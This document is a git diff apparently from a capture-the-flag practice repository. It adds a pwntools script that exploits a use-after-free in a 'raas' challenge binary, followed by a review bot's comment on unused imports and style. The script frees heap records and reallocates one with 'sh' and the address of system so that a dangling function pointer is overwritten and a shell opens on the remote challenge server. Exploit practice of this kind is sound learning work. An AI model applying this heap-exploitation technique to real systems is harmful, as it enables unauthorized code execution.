diff --git a/UAF/raas/answer.py b/UAF/raas/answer.py
new file mode 100644
index 0000000..a3836a5
--- /dev/null
+++ b/UAF/raas/answer.py
@@ -0,0 +1,48 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386",os = "linux", log_level = "debug")
+
+def record_new(p, index, rec_type, str_length, value):
+ p.recvuntil("Act > ")
+ p.sendline("1")
+ p.recvuntil("Index > ")
+ p.sendline(index)
+ p.recvuntil("Type > ")
+ p.sendline(rec_type)
+ if rec_type == "2":
+ p.recvuntil("Length > ")
+ p.sendline(str_length)
+ p.recvuntil("Value > ")
+ p.sendline(value)
+
+def record_del(p, index):
+ p.recvuntil("Act > ")
+ p.sendline("2")
+ p.recvuntil("Index > ")
+ p.sendline(index)
+
+p = remote("hackme.inndy.tw", 7719)
+# p = process('./raas.patched')
+elf = ELF('./raas.patched')
+gdb_command = """
+ b *0x80487a3
+ b *0x8048880
+ b *0x804893a
+ """
+# two malloc in do_new, call eax in do_del
+time.sleep(1)
+# gdb.attach(p, gdb_command)
+
+system_plt = elf.plt['system']
+
+record_new(p, "0", "1", None, "0")
+record_new(p, "1", "1", None, "0")
+record_del(p, "1")
+record_del(p, "0")
+record_new(p, "2", "2", "12" , "sh\x00\x00" + p32(system_plt))
+record_del(p, "1")
+
+p.interactive()
\ No newline at end of file
diff --git a/UAF/raas/raas b/UAF/raas/raas
new file mode 100755
index 0000000..05ac596
Binary files /dev/null and b/UAF/raas/raas differ
diff --git a/UAF/raas/raas.idb b/UAF/raas/raas.idb
new file mode 100644
index 0000000..fa6ce21
Binary files /dev/null and b/UAF/raas/raas.idb differ
diff --git a/UAF/raas/raas.patched b/UAF/raas/raas.patched
new file mode 100755
index 0000000..740710e
Binary files /dev/null and b/UAF/raas/raas.patched differ
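Review bot: The import header of answer.py pulls in names the file never references: `from LibcSearcher import *`, `from struct import pack`, and `os`, `base64`, `math` from `import os, base64, math, time` are all unused, so only `from pwn import *` and `import time` are actually needed. Trimming them also removes a third-party dependency (LibcSearcher) that a reader would otherwise have to install before the script even imports. The two star imports additionally hide where `remote`, `ELF`, `p32` and `context` come from; `from pwn import remote, ELF, p32, context` would make that explicit. Minor PEP 8 point in the same header: `context(arch = "i386",os = "linux", ...)` should drop the spaces around `=` in keyword arguments and add one after the comma.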